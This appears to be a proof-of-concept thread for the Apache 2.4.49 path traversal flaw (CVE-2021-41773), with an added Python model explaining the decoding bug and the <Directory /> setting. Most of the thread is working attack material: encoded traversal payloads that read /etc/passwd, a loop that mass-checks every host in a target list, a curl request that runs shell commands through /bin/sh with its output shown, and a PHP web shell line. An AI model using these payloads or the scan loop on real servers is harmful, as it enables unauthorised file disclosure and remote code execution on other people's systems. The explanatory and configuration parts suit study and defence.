CVE-2021-41773 POC
The vulnerability only works with Apache HTTP 2.4.49
And according to Shodan there are 112,755 Apache Server 2.4.49 hosts
127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
# mass check: probe every host in targets.txt with the traversal and treat a "root:" line from /etc/passwd as the vulnerable marker
cat targets.txt | while read -r host; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep -q "^root:" && printf '%s \033[0;31mVulnerable\033[0m\n' "$host" || printf '%s \033[0;32mNot Vulnerable\033[0m\n' "$host"; done
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
<?php echo system($_GET['c']); ?>
Local file disclosure
$ curl -s --path-as-is "http://localhost:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
Remote Code Execution
$ curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://localhost:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"
Bug
https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782
root@x:~# curl --silent --path-as-is --insecure "127.0.0.1/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address>
</body></html>
I think it is not reproducible under certain circumstances; maybe CGI has to be enabled for that.
Yes, it needs CGI enabled: https://github.com/blasty/CVE-2021-41773
EDIT:
RCE: https://twitter.com/wdormann/status/1445676921581228038
Regards!
WHK, the vulnerability only works with Apache HTTP 2.4.49, no earlier version.
With the mod_cgi module enabled --> it also allows RCE
MCKSys Argentina, and it also works on Windows, as Will Dormann comments on Twitter
https://twitter.com/wdormann/status/1445573881121546245
Related: https://twitter.com/wdormann/status/1445676921581228038
NSE script for the nmap scanner for the Apache 2.4.49 web server vulnerability
- CVE-2021-41773
https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse
Apache 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)
Image: https://pbs.twimg.com/media/FBM6yfQXoAcVtoX?format=jpg&name=small
- vulnerable:
<Directory />
Require all granted
</Directory>
- NOT vulnerable (** DEFAULT **)
<Directory />
Require all denied
</Directory>
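A model of why the `.%2e` payloads in this thread escape DocumentRoot while a literal `../` does not, and of why the `<Directory />` rule above decides whether the escaped path is actually served. This is an added example, not code from the thread or from Apache (the real routine is ap_normalize_path() in server/util.c); the DocumentRoot, the Alias/ScriptAlias table and the two `<Directory>` rule sets are assumed values for the illustration. The ordering it models is the one that makes the payload work: dot segments are collapsed on the still percent-encoded path, and `%2e` is decoded only afterwards, so `.%2e` passes the `..` check and becomes a real `..` at filesystem level.

```python
"""Model of the normalize-then-decode ordering behind CVE-2021-41773.

Added illustration only: this is not Apache's code (the real routine is
ap_normalize_path() in server/util.c). DocumentRoot, the Alias/ScriptAlias
table and the <Directory> rules are assumed values for the example.
"""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"                        # assumed DocumentRoot
ALIASES = {                                      # assumed Alias / ScriptAlias
    "/cgi-bin/": "/usr/lib/cgi-bin/",
    "/icons/": "/usr/share/apache2/icons/",
}
# Assumed <Directory> blocks, as "Require all granted" / "Require all denied".
DEFAULT_RULES = {"/": "denied", DOCROOT: "granted", "/usr/lib/cgi-bin": "granted"}
WEAK_RULES = {"/": "granted", DOCROOT: "granted", "/usr/lib/cgi-bin": "granted"}


def collapse_dot_segments(url_path: str) -> str:
    """Drop '.' segments and resolve '..' segments, never above the root.
    Only a literal '..' is recognised; '.%2e' or '%2e%2e' is an ordinary name."""
    stack = []
    for seg in url_path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if stack:
                stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack)


def map_to_filesystem(url_path: str) -> str:
    """Translate a normalized URL path to a filesystem path via the alias table."""
    for prefix, target in ALIASES.items():
        if url_path.startswith(prefix):
            return target + url_path[len(prefix):]
    return DOCROOT + url_path


def resolve_2449(url_path: str) -> str:
    """Vulnerable ordering: normalize the raw path, map it, decode last.
    An encoded dot survives the '..' check and is decoded after it."""
    fs_path = map_to_filesystem(collapse_dot_segments(url_path))
    return posixpath.normpath(unquote(fs_path))   # the OS now sees a real '..'


def resolve_fixed(url_path: str) -> str:
    """Hardened ordering: decode first, so every spelling of '..' is collapsed
    (and clamped at the URL root) before the path touches the filesystem."""
    normalized = collapse_dot_segments(unquote(url_path))
    return posixpath.normpath(map_to_filesystem(normalized))


def access_decision(fs_path: str, rules: dict) -> str:
    """Most specific <Directory> prefix wins, like Apache's directory walk."""
    matching = [d for d in rules
                if fs_path == d or fs_path.startswith(d.rstrip("/") + "/")]
    return rules[max(matching, key=len)]


def simulate(url_path: str, fixed: bool = False, rules: dict = DEFAULT_RULES) -> tuple:
    """Return (filesystem path, 'granted' | 'denied') for one request."""
    fs_path = resolve_fixed(url_path) if fixed else resolve_2449(url_path)
    return fs_path, access_decision(fs_path, rules)


if __name__ == "__main__":
    payloads = [
        "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",  # payload from the thread
        "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
        "/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh",             # RCE target when mod_cgi runs it
        "/cgi-bin/../../../../etc/passwd",                # literal '..' stays in DocumentRoot
    ]
    for p in payloads:
        for label, fixed in (("2.4.49", False), ("fixed", True)):
            for rules_name, rules in (("default", DEFAULT_RULES), ("weak", WEAK_RULES)):
                fs, decision = simulate(p, fixed, rules)
                print(f"{label:6} {rules_name:7} {p} -> {fs} [{decision}]")
```

Running it shows the two conditions the thread keeps coming back to: in the 2.4.49 ordering the encoded payloads resolve to /etc/passwd and /bin/sh while the literal ../ never leaves DocumentRoot, and even the escaped path is only served when `<Directory />` carries Require all granted; with the default Require all denied the model answers "denied" (a 403 in practice). The /bin/sh case only turns into RCE when mod_cgi executes the resolved file, which is why the POST body in the thread's curl command is a shell script.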